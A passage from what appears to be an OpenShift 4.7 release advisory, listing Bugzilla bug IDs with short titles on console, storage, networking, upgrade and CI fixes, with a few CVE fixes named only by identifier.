OCM link to open Insights tab\n1907989 - DataVolumes was intorduced in common templates - VM creation fails in the UI\n1907998 - Gather kube_pod_resource_request/limit metrics as exposed in upstream KEP 1916\n1908001 - [CVE-2020-10749] Update github.com/containernetworking/plugins to v.0.8.6 in egress-router-cni\n1908014 - e2e-aws-ansible and e2e-aws-helm are broken in ocp-release-operator-sdk\n1908035 - dynamic-demo-plugin build does not generate dist directory\n1908135 - quick search modal is not centered over topology\n1908145 - kube-scheduler-recovery-controller container crash loop when router pod is co-scheduled\n1908159 - [AWS C2S] MCO fails to sync cloud config\n1908171 - GCP: Installation fails when installing cluster with n1-custom-4-16384custom type (n1-custom-4-16384)\n1908180 - Add source for template is stucking in preparing pvc\n1908217 - CI: Server-Side Apply should work for oauth.openshift.io/v1: has no tokens\n1908231 - [Migration] The pods ovnkube-node are in  CrashLoopBackOff after SDN to OVN\n1908277 - QE - Automation- pipelines actions scripts\n1908280 - Documentation describing `ignore-volume-az` is incorrect\n1908296 - Fix pipeline builder form yaml switcher validation issue\n1908303 - [CVE-2020-28367 CVE-2020-28366] Remove CGO flag from rhel Dockerfile in Egress-Router-CNI\n1908323 - Create button missing for PLR in the search page\n1908342 - The new pv_collector_total_pv_count is not reported via telemetry\n1908344 - [vsphere-problem-detector] CheckNodeProviderID and CheckNodeDiskUUID have the same name\n1908347 - CVO overwrites ValidatingWebhookConfiguration for snapshots\n1908349 - Volume snapshot tests are failing after 1.20 rebase\n1908353 - QE - Automation- pipelines runs scripts\n1908361 - bump to k8s 1.20\n1908367 - QE - Automation- pipelines triggers scripts\n1908370 - QE - Automation- pipelines secrets scripts\n1908375 - QE - Automation- pipelines workspaces scripts\n1908381 - Go Dependency Fixes for Devfile Lib\n1908389 - Loadbalancer Sync failing on Azure\n1908400 - Tests-e2e, increase timeouts, re-add TestArchiveUploadedAndResultsReceived\n1908407 - Backport Upstream 95269 to fix potential crash in kubelet\n1908410 - Exclude Yarn from VSCode search\n1908425 - Create Role Binding form subject type and name are undefined when All Project is selected\n1908431 - When the marketplace-operator pod get\u0027s restarted, the custom catalogsources are gone, as well as the pods\n1908434 - Remove \u0026apos from metal3-plugin internationalized strings\n1908437 - Operator backed with no icon has no badge associated with the CSV tag\n1908459 - bump to k8s 1.20\n1908461 - Add bugzilla component to OWNERS file\n1908462 - RHCOS 4.6 ostree removed dhclient\n1908466 - CAPO AZ Screening/Validating\n1908467 - Zoom in and zoom out in topology package should be sentence case\n1908468 - [Azure][4.7] Installer can\u0027t properly parse instance type with non integer memory size\n1908469 - nbdb failed to come up while bringing up OVNKubernetes cluster\n1908471 - OLM should bump k8s dependencies to 1.20\n1908484 - oc adm release extract --cloud=aws --credentials-requests dumps all manifests\n1908493 - 4.7-e2e-metal-ipi-ovn-dualstack intermittent test failures, worker hostname is overwritten by NM\n1908545 - VM clone dialog does not open\n1908557 - [e2e][automation]Miss css id on bootsource and reviewcreate step on wizard\n1908562 - Pod readiness is not being observed in real world cases\n1908565 - [4.6] Cannot filter the platform/arch of the index image\n1908573 - Align the style of flavor\n1908583 - bootstrap does not run on additional networks if configured for master in install-config\n1908596 - Race condition on operator installation\n1908598 - Persistent Dashboard shows events for all provisioners\n1908641 - Go back to Catalog Page link on Virtual Machine page vanishes on empty state\n1908648 - Skip TestKernelType test on OKD, adjust TestExtensions\n1908650 - The title of customize wizard is inconsistent\n1908654 - cluster-api-provider: volumes and disks names shouldn\u0027t change by machine-api-operator\n1908675 - Reenable [sig-storage] CSI mock volume CSI FSGroupPolicy [LinuxOnly] should modify fsGroup if fsGroupPolicy=default [Suite:openshift/conformance/parallel] [Suite:k8s]\n1908687 - Option to save user settings separate when using local bridge (affects console developers only)\n1908697 - Show `kubectl diff ` command in the oc diff help page\n1908715 - Pressing the arrow up key when on topmost quick-search list item it should loop back to bottom\n1908716 - UI breaks on click of sidebar of ksvc (if revisions not up) in topology on 4.7 builds\n1908717 - \"missing unit character in duration\" error in some network dashboards\n1908746 - [Safari] Drop Shadow doesn\u0027t works as expected on hover on workload\n1908747 - stale S3 CredentialsRequest in CCO manifest\n1908758 - AWS: NLB timeout value is rejected by AWS cloud provider after 1.20 rebase\n1908830 - RHCOS 4.6 - Missing Initiatorname\n1908868 - Update empty state message for EventSources and Channels tab\n1908880 - 4.7 aws-serial CI: NoExecuteTaintManager Single Pod [Serial] eventually evict pod with finite tolerations from tainted nodes\n1908883 - CVE-2020-29652 golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference\n1908888 - Dualstack does not work with multiple gateways\n1908889 - Bump CNO to k8s 1.20\n1908891 - TestDNSForwarding DNS operator e2e test is failing frequently\n1908914 - CNO: upgrade nodes before masters\n1908918 - Pipeline builder yaml view sidebar is not responsive\n1908960 - QE - Design Gherkin Scenarios\n1908971 - Gherkin Script for pipeline debt 4.7\n1908983 - i18n: Add Horizontal Pod Autoscaler action menu is not translated\n1908997 - Unsupported access mode should not be available when creating pvc by cinder-csi-driver/gcp-pd-csi-driver from web-console\n1908998 - [cinder-csi-driver] doesn\u0027t detect the credentials change\n1909004 - \"No datapoints found\" for RHEL node\u0027s filesystem graph\n1909005 - i18n: workloads list view heading is not translated\n1909012 - csi snapshot webhook does not block any invalid update for volumesnapshot and volumesnapshotcontent objects\n1909027 - Disks option of Sectected capacity chart shows HDD disk even on selection of SDD disk type\n1909043 - OCP + OCS 4.7 Internal - Storage cluster creation throws warning when zone=0 in VMware\n1909067 - Web terminal should keep latest output when connection closes\n1909070 - PLR and TR Logs component is not streaming as fast as tkn\n1909092 - Error Message should not confuse user on Channel form\n1909096 - OCP 4.7+OCS 4.7 - The Requested Cluster Capacity field needs to include the selected capacity in calculation in Review and Create Page\n1909108 - Machine API components should use 1.20 dependencies\n1909116 - Catalog Sort Items dropdown is not aligned on Firefox\n1909198 - Move Sink action option is not working\n1909207 - Accessibility Issue on monitoring page\n1909236 - Remove pinned icon overlap on resource name\n1909249 - Intermittent packet drop from pod to pod\n1909276 - Accessibility Issue on create project modal\n1909289 - oc debug of an init container no longer works\n1909290 - Logging may be broken due to mix of k8s.io/klog v1 and v2\n1909358 - registry.redhat.io/redhat/community-operator-index:latest only have hyperfoil-bundle\n1909453 - Boot disk RAID can corrupt ESP if UEFI firmware writes to it\n1909455 - Boot disk RAID will not boot if the primary disk enumerates but fails I/O\n1909464 - Build operator-registry with golang-1.15\n1909502 - NO_PROXY is not matched between bootstrap and global cluster setting which lead to desired master machineconfig is not found\n1909521 - Add kubevirt cluster type for e2e-test workflow\n1909527 - [IPI Baremetal] After upgrade from 4.6 to 4.7 metal3 pod does not get created\n1909587 - [OCP4] all of the OCP master nodes with soft-anti-affinity run on the same OSP node\n1909610 - Fix available capacity when no storage class selected\n1909678 - scale up / down buttons available on pod details side panel\n1909723 - cluster-api-provider-openstack: Update ose-openstack-machine-controllers builder \u0026 base images to be consistent with ART\n1909730 - unbound variable error if EXTRA_PKGS_LIST is not defined\n1909739 - Arbiter request data changes\n1909744 - cluster-api-provider-openstack: Bump gophercloud\n1909790 - PipelineBuilder yaml view cannot be used for editing a pipeline\n1909791 - Update standalone kube-proxy config for EndpointSlice\n1909792 - Empty states for some details page subcomponents are not i18ned\n1909815 - Perspective switcher is only half-i18ned\n1909821 - OCS 4.7 LSO installation blocked because of Error \"Invalid value: \"integer\": spec.flexibleScaling in body\n1909836 - operator-install-global Cypress test was failing in OLM as it depends on an operator that isn\u0027t installed in CI\n1909864 - promote-release-openshift-machine-os-content-e2e-aws-4.5 is perm failing\n1909911 - [OVN]EgressFirewall caused a segfault\n1909943 - Upgrade from 4.6 to 4.7 stuck due to write /sys/devices/xxxx/block/sda/queue/scheduler: invalid argument\n1909958 - Support Quick Start Highlights Properly\n1909978 - ignore-volume-az = yes not working on standard storageClass\n1909981 - Improve statement in template select step\n1909992 - Fail to pull the bundle image when using the private index image\n1910024 - Reload issue in latest(4.7) UI code on 4.6 cluster locally in dev\n1910036 - QE - Design Gherkin Scenarios ODC-4504\n1910049 - UPI: ansible-galaxy is not supported\n1910127 - [UPI on oVirt]:  Improve UPI Documentation\n1910140 - fix the api dashboard with changes in upstream kube 1.20\n1910160 - If two OperatorConditions include the same deployments they will keep updating the deployment\u0027s containers with the OPERATOR_CONDITION_NAME Environment Variable\n1910165 - DHCP to static lease script doesn\u0027t handle multiple addresses\n1910305 - [Descheduler] - The minKubeVersion should be 1.20.0\n1910409 - Notification drawer is not localized for i18n\n1910459 - Could not provision gcp volume if delete secret gcp-pd-cloud-credentials\n1910492 - KMS details are auto-populated on the screen in next attempt at Storage cluster creation\n1910501 - Installed Operators-\u003eOperand required: Clicking on cancel in Storage cluster page takes back to the Install Operator page\n1910533 - [OVN] It takes about 5 minutes for EgressIP failover to work\n1910581 - library-go: proxy ENV is not injected into csi-driver-controller which lead to storage operator never get ready\n1910666 - Creating a Source Secret from type SSH-Key should use monospace font for better usability\n1910738 - OCP 4.7 Installation fails on VMWare due to 1 worker that is degraded\n1910739 - Redfish-virtualmedia (idrac) deploy fails on \"The Virtual Media image server is already connected\"\n1910753 - Support Directory Path to Devfile\n1910805 - Missing translation for Pipeline status and breadcrumb text\n1910829 - Cannot delete a PVC if the dv\u0027s phase is WaitForFirstConsumer\n1910840 - Show Nonexistent  command info in the `oc rollback -h` help page\n1910859 - breadcrumbs doesn\u0027t use last namespace\n1910866 - Unify templates string\n1910870 - Unify template dropdown action\n1911016 - Prometheus unable to mount NFS volumes after upgrading to 4.6\n1911129 - Monitoring charts renders nothing when switching from a Deployment to \"All workloads\"\n1911176 - [MSTR-998] Wrong text shown when hovering on lines of charts in API Performance dashboard\n1911212 - [MSTR-998] API Performance Dashboard \"Period\" drop-down has a choice \"$__auto_interval_period\" which can bring \"1:154: parse error: missing unit character in duration\"\n1911213 - Wrong and misleading warning for VMs that were created manually (not from template)\n1911257 - [aws-c2s] failed to create cluster, kube-cloud-config was not created\n1911269 - waiting for the build message present when build exists\n1911280 - Builder images are not detected for Dotnet, Httpd, NGINX\n1911307 - Pod Scale-up requires extra privileges in OpenShift web-console\n1911381 - \"Select Persistent Volume Claim project\" shows in customize wizard when select a source available template\n1911382 - \"source volumeMode (Block) and target volumeMode (Filesystem) do not match\" shows in VM Error\n1911387 - Hit error - \"Cannot read property \u0027value\u0027 of undefined\" while creating VM from template\n1911408 - [e2e][automation] Add auto-clone cli tests and new flow of VM creation\n1911418 - [v2v] The target storage class name is not displayed if default storage class is used\n1911434 - git ops empty state page displays icon with watermark\n1911443 - SSH Cretifiaction field should be validated\n1911465 - IOPS display wrong unit\n1911474 - Devfile Application Group Does Not Delete Cleanly (errors)\n1911487 - Pruning Deployments should use ReplicaSets instead of ReplicationController\n1911574 - Expose volume mode  on Upload Data form\n1911617 - [CNV][UI] Failure to add source to VM template when no default storage class is defined\n1911632 - rpm-ostree command fail due to wrong options when updating ocp-4.6 to 4.7 on worker nodes with rt-kernel\n1911656 - using \u0027operator-sdk run bundle\u0027 to install operator successfully, but the command output said \u0027Failed to run bundle\u0027\u0027\n1911664 - [Negative Test] After deleting metal3 pod, scaling worker stuck on provisioning state\n1911782 - Descheduler should not evict pod used local storage by the PVC\n1911796 - uploading flow being displayed before submitting the form\n1912066 - The ansible type operator\u0027s manager container is not stable when managing the CR\n1912077 - helm operator\u0027s default rbac forbidden\n1912115 - [automation] Analyze job keep failing because of \u0027JavaScript heap out of memory\u0027\n1912237 - Rebase CSI sidecars for 4.7\n1912381 - [e2e][automation] Miss css ID on Create Network Attachment Definition page\n1912409 - Fix flow schema deployment\n1912434 - Update guided tour modal title\n1912522 - DNS Operator e2e test: TestCoreDNSImageUpgrade is fundamentally broken\n1912523 - Standalone pod status not updating in topology graph\n1912536 - Console Plugin CR for console-demo-plugin has wrong apiVersion\n1912558 - TaskRun list and detail screen doesn\u0027t show Pending status\n1912563 - p\u0026f: carry 97206: clean up executing request on panic\n1912565 - OLM macOS local build broken by moby/term dependency\n1912567 - [OCP on RHV] Node becomes to \u0027NotReady\u0027 status when shutdown vm from RHV UI only on the second deletion\n1912577 - 4.1/4.2-\u003e4.3-\u003e...-\u003e 4.7 upgrade is stuck during 4.6-\u003e4.7 with co/openshift-apiserver Degraded, co/network not Available and several other components pods CrashLoopBackOff\n1912590 - publicImageRepository not being populated\n1912640 - Go operator\u0027s controller pods is forbidden\n1912701 - Handle dual-stack configuration for NIC IP\n1912703 - multiple queries can\u0027t be plotted in the same graph under some conditons\n1912730 - Operator backed: In-context should support visual connector if SBO is not installed\n1912828 - Align High Performance VMs with High Performance in RHV-UI\n1912849 - VM from wizard - default flavor does not match the actual flavor set by common templates\n1912852 - VM from wizard - available VM templates - \"storage\" field is \"0 B\"\n1912888 - recycler template should be moved to KCM operator\n1912907 - Helm chart repository index can contain unresolvable relative URL\u0027s\n1912916 - Set external traffic policy to cluster for IBM platform\n1912922 - Explicitly specifying the operator generated default certificate for an ingress controller breaks the ingress controller\n1912938 - Update confirmation modal for quick starts\n1912942 - cluster-storage-operator: proxy ENV is not injected into vsphere-problem-detector deployment\n1912944 - cluster-storage-operator: proxy ENV is not injected into Manila CSI driver operator deployment\n1912945 - aws-ebs-csi-driver-operator: proxy ENV is not injected into the CSI driver\n1912946 - gcp-pd-csi-driver-operator: proxy ENV is not injected into the CSI driver\n1912947 - openstack-cinder-csi-driver-operator: proxy ENV is not injected into the CSI driver\n1912948 - csi-driver-manila-operator: proxy ENV is not injected into the CSI driver\n1912949 - ovirt-csi-driver-operator: proxy ENV is not injected into the CSI driver\n1912977 - rebase upstream static-provisioner\n1913006 - Remove etcd v2 specific alerts with etcd_http* metrics\n1913011 - [OVN] Pod\u0027s external traffic not use egressrouter macvlan ip as a source ip\n1913037 - update static-provisioner base image\n1913047 - baremetal clusteroperator progressing status toggles between true and false when cluster is in a steady state\n1913085 - Regression OLM uses scoped client for CRD installation\n1913096 - backport: cadvisor machine metrics are missing in k8s 1.19\n1913132 - The installation of Openshift Virtualization reports success early before it \u0027s succeeded eventually\n1913154 - Upgrading to 4.6.10 nightly failed with RHEL worker nodes: Failed to find /dev/disk/by-label/root\n1913196 - Guided Tour doesn\u0027t handle resizing of browser\n1913209 - Support modal should be shown for community supported templates\n1913226 - [Migration] The SDN migration rollback failed if customize vxlanPort\n1913249 - update info alert this template is not aditable\n1913285 - VM list empty state should link to virtualization quick starts\n1913289 - Rebase AWS EBS CSI driver for 4.7\n1913292 - OCS 4.7 Installation failed over vmware when arbiter was enabled, as flexibleScaling is also getting enabled\n1913297 - Remove restriction of taints for arbiter node\n1913306 - unnecessary scroll bar is present on quick starts panel\n1913325 - 1.20 rebase for openshift-apiserver\n1913331 - Import from git: Fails to detect Java builder\n1913332 - Pipeline visualization breaks the UI when multiple taskspecs are used\n1913343 - (release-4.7) Added changelog file for insights-operator\n1913356 - (release-4.7) Implemented gathering specific logs from openshift apiserver operator\n1913371 - Missing i18n key \"Administrator\" in namespace \"console-app\" and language \"en.\"\n1913386 - users can see metrics of namespaces for which they don\u0027t have rights when monitoring own services with prometheus user workloads\n1913420 - Time duration setting of resources is not being displayed\n1913536 - 4.6.9 -\u003e 4.7 upgrade hangs.  RHEL 7.9 worker stuck on \"error enabling unit: Failed to execute operation: File exists\\\\n\\\"\n1913554 - Recording rule for ingress error fraction SLI is incorrect, uses irate instead of increase\n1913560 - Normal user cannot load template on the new wizard\n1913563 - \"Virtual Machine\" is not on the same line in create button when logged with normal user\n1913567 - Tooltip data should be same for line chart or stacked chart, display data value same as the table\n1913568 - Normal user cannot create template\n1913582 - [Migration]SDN to OVN migration stucks on MCO for rhel worker\n1913585 - Topology descriptive text fixes\n1913608 - Table data contains data value None after change time range in graph and change back\n1913651 - Improved Red Hat image and crashlooping OpenShift pod collection\n1913660 - Change location and text of Pipeline edit flow alert\n1913685 - OS field not disabled when creating a VM from a template\n1913716 - Include additional use of existing libraries\n1913725 - Refactor Insights Operator Plugin states\n1913736 - Regression: fails to deploy computes when using root volumes\n1913747 - Update operator to kubernetes 1.20.1 to pickup upstream fixes\n1913751 - add third-party network plugin test suite to openshift-tests\n1913783 - QE-To fix the merging pr issue, commenting the afterEach() block\n1913807 - Template support badge should not be shown for community supported templates\n1913821 - Need definitive steps about uninstalling descheduler operator\n1913851 - Cluster Tasks are not sorted in pipeline builder\n1913864 - BuildConfig YAML template references ruby ImageStreamTag that no longer exists\n1913951 - Update the Devfile Sample Repo to an Official Repo Host\n1913960 - Cluster Autoscaler should use 1.20 dependencies\n1913969 - Field dependency descriptor can sometimes cause an exception\n1914060 - Disk created from \u0027Import via Registry\u0027 cannot be used as boot disk\n1914066 - [sriov] sriov dp pod crash when delete ovs HW offload policy\n1914090 - Grafana - The resulting dataset is too large to graph (OCS RBD volumes being counted as disks)\n1914119 - vsphere problem detector operator has no permission to update storages.operator.openshift.io instances\n1914125 - Still using /dev/vde as default device path when create localvolume\n1914183 - Empty NAD page is missing link to quickstarts\n1914196 - target port in `from dockerfile` flow does nothing\n1914204 - Creating VM from dev perspective may fail with template not found error\n1914209 - Associate image secret name to pipeline serviceaccount imagePullSecrets\n1914212 - [e2e][automation] Add test to validate bootable disk souce\n1914250 - ovnkube-node fails on master nodes when both DHCPv6 and SLAAC addresses are configured on nodes\n1914284 - Upgrade to OCP 4.6.9 results in cluster-wide DNS and connectivity issues due to bad NetworkPolicy flows\n1914287 - Bring back selfLink\n1914301 - User VM Template source should show the same provider as template itself\n1914303 - linuxptp-daemon is not forwarding ptp4l stderr output to openshift logs\n1914309 - /terminal page when WTO not installed shows nonsensical error\n1914334 - order of getting started samples is arbitrary\n1914343 - [sig-imageregistry][Feature:ImageTriggers] Annotation trigger reconciles after the image is overwritten [Suite:openshift/conformance/parallel]  timeout on s390x\n1914349 - Increase and decrease buttons in max and min pods in HPA page has distorted UI\n1914405 - Quick search modal should be opened when coming back from a selection\n1914407 - Its not clear that node-ca is running as non-root\n1914427 - Count of pods on the dashboard is incorrect\n1914439 - Typo in SRIOV port create command example\n1914451 - cluster-storage-operator pod running as root\n1914452 - oc image append, oc image extract outputs wrong suggestion to use --keep-manifest-list=true\n1914642 - Customize Wizard Storage tab does not pass validation\n1914723 - SamplesTBRInaccessibleOnBoot Alert has a misspelling\n1914793 - device names should not be translated\n1914894 - Warn about using non-groupified api version\n1914926 - webdriver-manager pulls incorrect version of ChomeDriver due to a bug\n1914932 - Put correct resource name in relatedObjects\n1914938 - PVC disk is not shown on customization wizard general tab\n1914941 - VM Template rootdisk is not deleted after fetching default disk bus\n1914975 - Collect logs from openshift-sdn namespace\n1915003 - No estimate of average node readiness during lifetime of a cluster\n1915027 - fix MCS blocking iptables rules\n1915041 - s3:ListMultipartUploadParts is relied on implicitly\n1915079 - Canary controller should not periodically rotate the canary route endpoint for performance reasons\n1915080 - Large number of tcp connections with shiftstack ocp cluster in about 24 hours\n1915085 - Pods created and rapidly terminated get stuck\n1915114 - [aws-c2s] worker machines are not create during install\n1915133 - Missing default pinned nav items in dev perspective\n1915176 - Update snapshot API CRDs to v1 in web-console when creating volumesnapshot related resource\n1915187 - Remove the \"Tech preview\" tag in web-console for volumesnapshot\n1915188 - Remove HostSubnet anonymization\n1915200 - [OCP 4.7+ OCS 4.6]Arbiter related Note should not show up during UI deployment\n1915217 - OKD payloads expect to be signed with production keys\n1915220 - Remove dropdown workaround for user settings\n1915235 - Failed to upgrade to 4.7 from 4.6 due to the machine-config failure\n1915262 - When deploying with assisted install the CBO operator is installed and enabled without metal3 pod\n1915277 - [e2e][automation]fix cdi upload form test\n1915295 - [BM][IP][Dualstack] Installation failed - operators report dial tcp 172.30.0.1:443: i/o timeout\n1915304 - Updating scheduling component builder \u0026 base images to be consistent with ART\n1915312 - Prevent schedule Linux openshift-network-diagnostics pod on Windows node\n1915318 - [Metal] bareMetal IPI - cannot interact with toolbox container after first execution only in parallel from different connection\n1915348 - [RFE] linuxptp operator needs to expose the uds_address_socket to be used by an application pod\n1915357 - Dev Catalog doesn\u0027t load anything if virtualization operator is installed\n1915379 - New template wizard should require provider and make support input a dropdown type\n1915408 - Failure in operator-registry kind e2e test\n1915416 - [Descheduler] descheduler evicts pod which does not have any ownerRef or descheduler evict annotation\n1915460 - Cluster name size might affect installations\n1915500 - [aws c2s] kube-controller-manager crash loops trying to fetch the AWS instance\n1915540 - Silent 4.7 RHCOS install failure on ppc64le\n1915579 - [Metal] redhat-support-tool became unavailable after tcpdump usage (BareMetal IPI)\n1915582 - p\u0026f: carry upstream pr 97860\n1915594 - [e2e][automation] Improve test for disk validation\n1915617 - Bump bootimage for various fixes\n1915624 - \"Please fill in the following field: Template provider\" blocks customize wizard\n1915627 - Translate Guided Tour text. \n1915643 - OCP4.6 to 4.7 upgrade failed due to manila csi driver operator sync error\n1915647 - Intermittent White screen when the connector dragged to revision\n1915649 - \"Template support\" pop up is not a warning; checkbox text should be rephrased\n1915654 - [e2e][automation] Add a verification for Afinity modal should hint \"Matching node found\"\n1915661 - Can\u0027t run the \u0027oc adm prune\u0027 command in a pod\n1915672 - Kuryr doesn\u0027t work with selfLink disabled. \n1915674 - Golden image PVC creation - storage size should be taken from the template\n1915685 - Message for not supported template is not clear enough\n1915760 - Need to increase timeout to wait rhel worker get ready\n1915793 - quick starts panel syncs incorrectly across browser windows\n1915798 - oauth connection errors for openshift console pods on an OVNKube OCP 4.7 cluster\n1915818 - vsphere-problem-detector: use \"_totals\" in metrics\n1915828 - Latest Dell firmware (04.40.00.00) fails to install IPI on BM using idrac-virtualmedia protocol\n1915859 - vsphere-problem-detector: does not report ESXi host version nor VM HW version\n1915871 - operator-sdk version in new downstream image should be v1.2.0-ocp not v4.7.0\n1915879 - Pipeline Dashboard tab Rename to Pipeline Metrics\n1915885 - Kuryr doesn\u0027t support workers running on multiple subnets\n1915898 - TaskRun log output shows \"undefined\" in streaming\n1915907 - test/cmd/builds.sh uses docker.io\n1915912 - sig-storage-csi-snapshotter image not available\n1915926 - cluster-api-provider-openstack: Update ose-openstack-machine-controllers builder \u0026 base images to be consistent with ART\n1915929 - A11y Violation: svg-img-alt for time axis of Utilization Card on Cluster Dashboard\n1915939 - Resizing the browser window removes Web Terminal Icon\n1915945 - [sig-scheduling] SchedulerPreemption [Serial] validates basic preemption works [Conformance]\n1915959 - Baremetal cluster operator is included in a ROKS installation of 4.7\n1915962 - ROKS: manifest with machine health check fails to apply in 4.7\n1915972 - Global configuration breadcrumbs do not work as expected\n1915981 - Install ethtool and conntrack in container for debugging\n1915995 - \"Edit RoleBinding Subject\" action under RoleBinding list page kebab actions causes unhandled exception\n1915998 - Installer bootstrap node setting of additional subnets inconsistent with additional security groups\n1916021 - OLM enters infinite loop if Pending CSV replaces itself\n1916056 - Need Visual Web Terminal metric enabled for OCP monitoring telemetry\n1916081 - non-existant should be non-existent in CloudCredentialOperatorTargetNamespaceMissing alert\u0027s annotations\n1916099 - VM creation - customization wizard - user should be allowed to delete and re-create root disk\n1916126 - [e2e][automation] Help fix tests for vm guest-agent and next-run-configuration\n1916145 - Explicitly set minimum versions of python libraries\n1916164 - Update csi-driver-nfs builder \u0026 base images to be consistent with ART\n1916221 - csi-snapshot-controller-operator: bump dependencies for 4.7\n1916271 - Known issues should mention failure to apply soft-anti-affinity to masters beyond the third\n1916363 - [OVN] ovs-configuration.service reports as failed within all nodes using version 4.7.0-fc.2\n1916379 - error metrics from vsphere-problem-detector should be gauge\n1916382 - Can\u0027t create ext4 filesystems with Ignition\n1916384 - 4.5.15 and later cluster-version operator does not sync ClusterVersion status before exiting, leaving \u0027verified: false\u0027 even for verified updates\n1916401 - Deleting an ingress controller with a bad DNS Record hangs\n1916417 - [Kuryr] Must-gather does not have all Custom Resources information\n1916419 - [sig-devex][Feature:ImageEcosystem][Slow] openshift images should be SCL enabled returning s2i usage when running the image\n1916454 - teach CCO about upgradeability from 4.6 to 4.7\n1916486 - [OCP RHV] [Docs] Update RHV CSI provisioning section in OCP documenation\n1916502 - Boot disk mirroring fails with mdadm error\n1916524 - Two rootdisk shows on storage step\n1916580 - Default yaml is broken for VM and VM template\n1916621 - oc adm node-logs examples are wrong\n1916642 - [zh_CN] Redundant period in Secrets - Create drop down menu - Key value secret. \n1916692 - Possibly fails to destroy LB and thus cluster\n1916711 - Update Kube dependencies in MCO to 1.20.0\n1916747 - remove links to quick starts if virtualization operator isn\u0027t updated to 2.6\n1916764 - editing a workload with no application applied, will auto fill the app\n1916834 - Pipeline Metrics - Text Updates\n1916843 - collect logs from openshift-sdn-controller pod\n1916853 - cluster will not gracefully recover if openshift-etcd namespace is removed\n1916882 - OCS 4.7 LSO : wizard (Discover disks and create storageclass) does not show zone when topology.kubernetes.io/zone are added manually\n1916888 - OCS wizard Donor chart does not get updated when `Device Type` is edited\n1916938 - Using 4.6 install-config.yaml file with lbFloatingIP results in validation error \"Forbidden: cannot specify lbFloatingIP and apiFloatingIP together\"\n1916949 - ROKS: manifests in openshift-oauth-apiserver ns fails to create with non-existent namespace\n1917101 - [UPI on oVirt] - \u0027RHCOS image\u0027 topic isn\u0027t located in the right place in UPI document\n1917114 - Upgrade from 4.5.9 to 4.7 fails as authentication operator is Degraded due to \u0027\"ProxyConfigController\" controller failed to sync \"key\"\u0027 error\n1917117 - Common templates - disks screen: invalid disk name\n1917124 - Custom template - clone existing PVC - the name of the target VM\u0027s data volume is hard-coded; only one VM can be created\n1917146 - [oVirt] Consume 23-10 ovirt sdk- csi operator\n1917147 - [oVirt] csi operator panics if ovirt-engine suddenly becomes unavailable. \n1917148 - [oVirt] Consume 23-10 ovirt sdk\n1917239 - Monitoring time options overlaps monitoring tab navigation when Quickstart panel is opened\n1917272 - Should update the default minSize to 1Gi when create localvolumeset on web console\n1917303 - [automation][e2e] make kubevirt-plugin gating job mandatory\n1917315 - localvolumeset-local-provisoner-xxx pods are not killed after upgrading from 4.6 to 4.7\n1917327 - annotations.message maybe wrong for NTOPodsNotReady alert\n1917367 - Refactor periodic.go\n1917371 - Add docs on how to use the built-in profiler\n1917372 - Application metrics are shown on Metrics dashboard but not in linked Prometheus UI in OCP management console\n1917395 - pv-pool backing store name restriction should be at 43 characters from the ocs ui\n1917484 - [BM][IPI] Failed to scale down machineset\n1917522 - Deprecate --filter-by-os in oc adm catalog mirror\n1917537 - controllers continuously busy reconciling operator\n1917551 - use min_over_time for vsphere prometheus alerts\n1917585 - OLM Operator install page missing i18n\n1917587 - Manila CSI operator becomes degraded if user doesn\u0027t have permissions to list share types\n1917605 - Deleting an exgw causes pods to no longer route to other exgws\n1917614 - [aws c2s] ingress operator uses unavailable resourcegrouptaggings API\n1917656 - Add to Project/application for eventSources from topology shows 404\n1917658 - Show TP badge for sources powered by camel connectors in create flow\n1917660 - Editing parallelism of job get error info\n1917678 - Could not provision pv when no symlink and target found on rhel worker\n1917679 - Hide double CTA in admin pipelineruns tab\n1917683 - `NodeTextFileCollectorScrapeError` alert in OCP 4.6 cluster. \n1917759 - Console operator panics after setting plugin that does not exists to the console-operator config\n1917765 - ansible-operator version in downstream image should be v1.3.0 not v4.7.0\n1917770 - helm-operator version in downstream image should be v1.3.0 not v4.7.0\n1917799 - Gather s list of names and versions of installed OLM operators\n1917803 - [sig-storage] Pod Disks should be able to delete a non-existent PD without error\n1917814 - Show Broker create option in eventing under admin perspective\n1917838 - MachineSet scaling from 0 is not available or evaluated incorrectly for the new or changed instance types\n1917872 - [oVirt] rebase on latest SDK 2021-01-12\n1917911 - network-tools needs ovnkube-trace binary from ovn-kubernetes image\n1917938 - upgrade version of dnsmasq package\n1917942 - Canary controller causes panic in ingress-operator\n1918019 - Undesired scrollbars in markdown area of QuickStart\n1918068 - Flaky olm integration tests\n1918085 - reversed name of job and namespace in cvo log\n1918112 - Flavor is not editable if a customize VM is created from cli\n1918129 - Update IO sample archive with missing resources \u0026 remove IP anonymization from clusteroperator resources\n1918132 - i18n: Volume Snapshot Contents menu is not translated\n1918133 - [e2e][automation] Fix ocp 4.7 existing tests - part2\n1918140 - Deployment openstack-cinder-csi-driver-controller and openstack-manila-csi-controllerplugin doesn\u0027t be installed on OSP\n1918153 - When `\u0026` character is set as an environment variable in a build config it is getting converted as `\\u0026`\n1918185 - Capitalization on PLR details page\n1918287 - [ovirt] ovirt csi driver is flooding RHV with API calls and spam the event UI with new connections\n1918318 - Kamelet connector\u0027s are not shown in eventing section under Admin perspective\n1918351 - Gather SAP configuration (SCC \u0026 ClusterRoleBinding)\n1918375 - [calico] rbac-proxy container in kube-proxy fails to create tokenreviews\n1918395 - [ovirt] increase livenessProbe period\n1918415 - MCD nil pointer on dropins\n1918438 - [ja_JP, zh_CN] Serverless i18n misses\n1918440 - Kernel Arguments get reapplied even when no new kargs has been added in MachineConfig\n1918471 - CustomNoUpgrade Feature gates are not working correctly\n1918558 - Supermicro nodes boot to PXE upon reboot after successful deployment to disk\n1918622 - Updating ose-jenkins-agent-maven builder \u0026 base images to be consistent with ART\n1918623 - Updating ose-jenkins-agent-nodejs-12 builder \u0026 base images to be consistent with ART\n1918625 - Updating ose-jenkins-agent-nodejs-10 builder \u0026 base images to be consistent with ART\n1918635 - Updating openshift-jenkins-2 builder \u0026 base images to be consistent with ART #1197\n1918639 - Event listener with triggerRef crashes the console\n1918648 - Subscription page doesn\u0027t show InstallPlan correctly\n1918716 - Manilacsi becomes degraded even though it is not available with the underlying Openstack\n1918748 - helmchartrepo is not http(s)_proxy-aware\n1918757 - Consistant fallures of features/project-creation.feature Cypress test in CI\n1918803 - Need dedicated details page w/ global config breadcrumbs for \u0027KnativeServing\u0027 plugin\n1918826 - Insights popover icons are not horizontally aligned\n1918879 - need better debug for bad pull secrets\n1918958 - The default NMstate instance from the operator is incorrect\n1919097 - Close bracket \")\" missing at the end of the sentence in the UI\n1919231 - quick search modal cut off on smaller screens\n1919259 - Make \"Add x\" singular in 